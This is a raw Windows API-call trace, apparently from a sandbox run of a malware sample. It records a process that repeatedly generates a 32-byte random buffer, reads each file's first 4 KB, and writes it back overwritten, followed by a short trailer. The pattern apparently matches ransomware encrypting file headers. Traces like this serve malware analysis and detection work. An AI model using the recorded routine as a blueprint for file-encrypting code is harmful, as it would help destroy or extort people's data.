RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0084.482] GetProcessHeap () returned 0x4f10000 [0084.482] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0084.482] ReadFile (in: hFile=0x988, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0084.530] SetFilePointerEx (in: hFile=0x988, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.530] WriteFile (in: hFile=0x988, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0084.530] GetProcessHeap () returned 0x4f10000 [0084.530] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0084.530] GetProcessHeap () returned 0x4f10000 [0084.530] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.531] GetProcessHeap () returned 0x4f10000 [0084.531] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0084.531] GetProcessHeap () returned 0x4f10000 [0084.531] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.531] GetProcessHeap () returned 0x4f10000 [0084.531] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0084.531] GetProcessHeap () returned 0x4f10000 [0084.531] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.531] GetProcessHeap () returned 0x4f10000 [0084.531] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.531] GetProcessHeap () returned 0x4f10000 [0084.531] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.531] GetProcessHeap () returned 0x4f10000 [0084.531] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.531] GetProcessHeap () returned 0x4f10000 [0084.531] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.531] GetProcessHeap () returned 0x4f10000 [0084.531] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.531] GetProcessHeap () returned 0x4f10000 [0084.531] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.531] GetProcessHeap () returned 0x4f10000 [0084.531] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.531] GetProcessHeap () returned 0x4f10000 [0084.531] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.531] GetProcessHeap () returned 0x4f10000 [0084.531] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.531] GetProcessHeap () returned 0x4f10000 [0084.531] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.531] GetProcessHeap () returned 0x4f10000 [0084.531] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.531] GetProcessHeap () returned 0x4f10000 [0084.531] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.531] GetProcessHeap () returned 0x4f10000 [0084.531] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.531] GetProcessHeap () returned 0x4f10000 [0084.531] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.531] GetProcessHeap () returned 0x4f10000 [0084.531] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.532] GetProcessHeap () returned 0x4f10000 [0084.532] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.532] GetProcessHeap () returned 0x4f10000 [0084.532] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.532] GetProcessHeap () returned 0x4f10000 [0084.532] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.532] GetProcessHeap () returned 0x4f10000 [0084.532] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.532] GetProcessHeap () returned 0x4f10000 [0084.532] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.532] GetProcessHeap () returned 0x4f10000 [0084.532] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.532] GetProcessHeap () returned 0x4f10000 [0084.532] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.532] GetProcessHeap () returned 0x4f10000 [0084.532] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.532] GetProcessHeap () returned 0x4f10000 [0084.532] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.532] GetProcessHeap () returned 0x4f10000 [0084.532] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.532] GetProcessHeap () returned 0x4f10000 [0084.532] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.532] GetProcessHeap () returned 0x4f10000 [0084.532] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.532] GetProcessHeap () returned 0x4f10000 [0084.532] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.532] GetProcessHeap () returned 0x4f10000 [0084.532] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.532] GetProcessHeap () returned 0x4f10000 [0084.532] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.532] GetProcessHeap () returned 0x4f10000 [0084.532] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.532] GetProcessHeap () returned 0x4f10000 [0084.532] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.532] GetProcessHeap () returned 0x4f10000 [0084.532] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0084.532] GetProcessHeap () returned 0x4f10000 [0084.532] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.532] GetProcessHeap () returned 0x4f10000 [0084.532] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0084.533] GetProcessHeap () returned 0x4f10000 [0084.533] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0084.533] GetProcessHeap () returned 0x4f10000 [0084.533] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0084.533] GetProcessHeap () returned 0x4f10000 [0084.533] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0084.533] GetProcessHeap () returned 0x4f10000 [0084.533] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0084.533] GetProcessHeap () returned 0x4f10000 [0084.533] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0084.533] GetProcessHeap () returned 0x4f10000 [0084.533] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.533] GetProcessHeap () returned 0x4f10000 [0084.533] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0084.533] GetProcessHeap () returned 0x4f10000 [0084.533] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.533] GetProcessHeap () returned 0x4f10000 [0084.533] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.533] GetProcessHeap () returned 0x4f10000 [0084.533] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.533] GetProcessHeap () returned 0x4f10000 [0084.533] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.533] GetProcessHeap () returned 0x4f10000 [0084.533] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.533] GetProcessHeap () returned 0x4f10000 [0084.533] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.533] GetProcessHeap () returned 0x4f10000 [0084.533] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.533] GetProcessHeap () returned 0x4f10000 [0084.533] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.533] GetProcessHeap () returned 0x4f10000 [0084.533] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.534] GetProcessHeap () returned 0x4f10000 [0084.534] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.534] GetProcessHeap () returned 0x4f10000 [0084.534] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.534] GetProcessHeap () returned 0x4f10000 [0084.534] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.534] GetProcessHeap () returned 0x4f10000 [0084.534] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.534] GetProcessHeap () returned 0x4f10000 [0084.534] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.534] GetProcessHeap () returned 0x4f10000 [0084.534] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.534] GetProcessHeap () returned 0x4f10000 [0084.534] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.534] GetProcessHeap () returned 0x4f10000 [0084.534] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.534] GetProcessHeap () returned 0x4f10000 [0084.534] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.534] GetProcessHeap () returned 0x4f10000 [0084.534] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.534] GetProcessHeap () returned 0x4f10000 [0084.534] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.534] GetProcessHeap () returned 0x4f10000 [0084.534] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.534] GetProcessHeap () returned 0x4f10000 [0084.534] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.534] GetProcessHeap () returned 0x4f10000 [0084.534] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.535] GetProcessHeap () returned 0x4f10000 [0084.535] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.535] GetProcessHeap () returned 0x4f10000 [0084.535] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0084.535] GetProcessHeap () returned 0x4f10000 [0084.535] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.535] GetProcessHeap () returned 0x4f10000 [0084.535] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0084.535] GetProcessHeap () returned 0x4f10000 [0084.535] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0084.535] GetProcessHeap () returned 0x4f10000 [0084.535] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0084.535] GetProcessHeap () returned 0x4f10000 [0084.535] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0084.535] SetFilePointerEx (in: hFile=0x988, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.535] WriteFile (in: hFile=0x988, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0xff, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0xff, lpOverlapped=0x0) returned 1 [0084.535] WriteFile (in: hFile=0x988, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0084.535] GetProcessHeap () returned 0x4f10000 [0084.535] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0084.535] GetProcessHeap () returned 0x4f10000 [0084.535] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0084.535] GetProcessHeap () returned 0x4f10000 [0084.535] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0084.535] CloseHandle (hObject=0x988) returned 1 [0084.537] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 132 [0084.537] SetFilePointerEx (in: hFile=0x98c, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.537] ReadFile (in: hFile=0x98c, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0084.537] SetFilePointerEx (in: hFile=0x98c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.537] GetProcessHeap () returned 0x4f10000 [0084.537] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0084.537] GetProcessHeap () returned 0x4f10000 [0084.537] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0084.537] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0084.537] GetProcessHeap () returned 0x4f10000 [0084.537] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0084.537] ReadFile (in: hFile=0x98c, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0084.585] SetFilePointerEx (in: hFile=0x98c, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.585] WriteFile (in: hFile=0x98c, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0084.585] GetProcessHeap () returned 0x4f10000 [0084.585] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0084.585] GetProcessHeap () returned 0x4f10000 [0084.585] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.585] GetProcessHeap () returned 0x4f10000 [0084.585] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0084.585] GetProcessHeap () returned 0x4f10000 [0084.585] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.585] GetProcessHeap () returned 0x4f10000 [0084.585] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0084.586] GetProcessHeap () returned 0x4f10000 [0084.586] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.586] GetProcessHeap () returned 0x4f10000 [0084.586] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.586] GetProcessHeap () returned 0x4f10000 [0084.586] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.586] GetProcessHeap () returned 0x4f10000 [0084.586] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.586] GetProcessHeap () returned 0x4f10000 [0084.586] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.586] GetProcessHeap () returned 0x4f10000 [0084.586] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.586] GetProcessHeap () returned 0x4f10000 [0084.586] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.586] GetProcessHeap () returned 0x4f10000 [0084.586] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.586] GetProcessHeap () returned 0x4f10000 [0084.586] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.586] GetProcessHeap () returned 0x4f10000 [0084.586] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.586] GetProcessHeap () returned 0x4f10000 [0084.586] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.586] GetProcessHeap () returned 0x4f10000 [0084.586] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.586] GetProcessHeap () returned 0x4f10000 [0084.586] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.586] GetProcessHeap () returned 0x4f10000 [0084.586] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.586] GetProcessHeap () returned 0x4f10000 [0084.586] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.586] GetProcessHeap () returned 0x4f10000 [0084.586] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.586] GetProcessHeap () returned 0x4f10000 [0084.586] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.586] GetProcessHeap () returned 0x4f10000 [0084.586] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.586] GetProcessHeap () returned 0x4f10000 [0084.586] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.586] GetProcessHeap () returned 0x4f10000 [0084.587] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.587] GetProcessHeap () returned 0x4f10000 [0084.587] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.587] GetProcessHeap () returned 0x4f10000 [0084.587] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.587] GetProcessHeap () returned 0x4f10000 [0084.587] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.587] GetProcessHeap () returned 0x4f10000 [0084.587] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.587] GetProcessHeap () returned 0x4f10000 [0084.587] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.587] GetProcessHeap () returned 0x4f10000 [0084.587] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.587] GetProcessHeap () returned 0x4f10000 [0084.587] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.587] GetProcessHeap () returned 0x4f10000 [0084.587] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.587] GetProcessHeap () returned 0x4f10000 [0084.587] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.587] GetProcessHeap () returned 0x4f10000 [0084.587] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.587] GetProcessHeap () returned 0x4f10000 [0084.587] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.587] GetProcessHeap () returned 0x4f10000 [0084.587] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.587] GetProcessHeap () returned 0x4f10000 [0084.587] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.587] GetProcessHeap () returned 0x4f10000 [0084.587] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0084.587] GetProcessHeap () returned 0x4f10000 [0084.587] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.587] GetProcessHeap () returned 0x4f10000 [0084.587] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0084.587] GetProcessHeap () returned 0x4f10000 [0084.587] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0084.587] GetProcessHeap () returned 0x4f10000 [0084.587] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0084.587] GetProcessHeap () returned 0x4f10000 [0084.587] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0084.587] GetProcessHeap () returned 0x4f10000 [0084.588] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0084.588] GetProcessHeap () returned 0x4f10000 [0084.588] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0084.588] GetProcessHeap () returned 0x4f10000 [0084.588] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.588] GetProcessHeap () returned 0x4f10000 [0084.588] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0084.588] GetProcessHeap () returned 0x4f10000 [0084.588] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.588] GetProcessHeap () returned 0x4f10000 [0084.588] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.588] GetProcessHeap () returned 0x4f10000 [0084.588] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.588] GetProcessHeap () returned 0x4f10000 [0084.588] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.588] GetProcessHeap () returned 0x4f10000 [0084.588] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.588] GetProcessHeap () returned 0x4f10000 [0084.588] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.588] GetProcessHeap () returned 0x4f10000 [0084.588] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.589] GetProcessHeap () returned 0x4f10000 [0084.589] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.589] GetProcessHeap () returned 0x4f10000 [0084.589] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.589] GetProcessHeap () returned 0x4f10000 [0084.589] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.589] GetProcessHeap () returned 0x4f10000 [0084.589] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.589] GetProcessHeap () returned 0x4f10000 [0084.589] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.589] GetProcessHeap () returned 0x4f10000 [0084.589] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.589] GetProcessHeap () returned 0x4f10000 [0084.589] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.589] GetProcessHeap () returned 0x4f10000 [0084.589] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.589] GetProcessHeap () returned 0x4f10000 [0084.589] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.589] GetProcessHeap () returned 0x4f10000 [0084.589] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.589] GetProcessHeap () returned 0x4f10000 [0084.589] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.589] GetProcessHeap () returned 0x4f10000 [0084.589] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 